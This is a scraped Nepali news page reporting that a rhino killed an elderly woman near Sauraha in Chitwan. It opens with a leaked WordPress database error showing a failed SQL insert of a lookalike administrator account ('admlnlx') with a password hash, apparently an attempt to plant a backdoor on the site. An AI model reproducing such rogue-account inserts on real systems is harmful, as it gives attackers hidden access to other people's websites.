WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJhUXiIzXcdV64vTx5Rc.u1/fkHIPz.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-31 22:01:26', '', 'admlnlx', 'admlnlx')
विकास पौडेल,
चितवन, पुस ४–
चितवनमा गैंडाको आक्रमणबाट एक जनाको मृत्यु भएको छ । चितवनको सौराहा नजिक रत्ननगर नगरपालिका–१७ स्थित खगेरी खोलामा भैसीलाई पानी खुवाउन लैजादै गर्दा गैंडाको आक्रमणमा परि एक महिलाको मृत्यु भएको हो ।
मृत्यु हुनेमा सोही स्थान निवासी ६९ वर्षीया मोतीमाया तामाङ रहेको चितवन प्रहरीले जनाएको छ । उनको घटनास्थलमै मृत्यु भएको प्रहरीको भनाई छ । चितवनमा वर्षेनी गैंडाको आक्रमणबाट कयौंले ज्यान गुमाउने गरेका छन् ।
तस्विरः बाबुराम परियार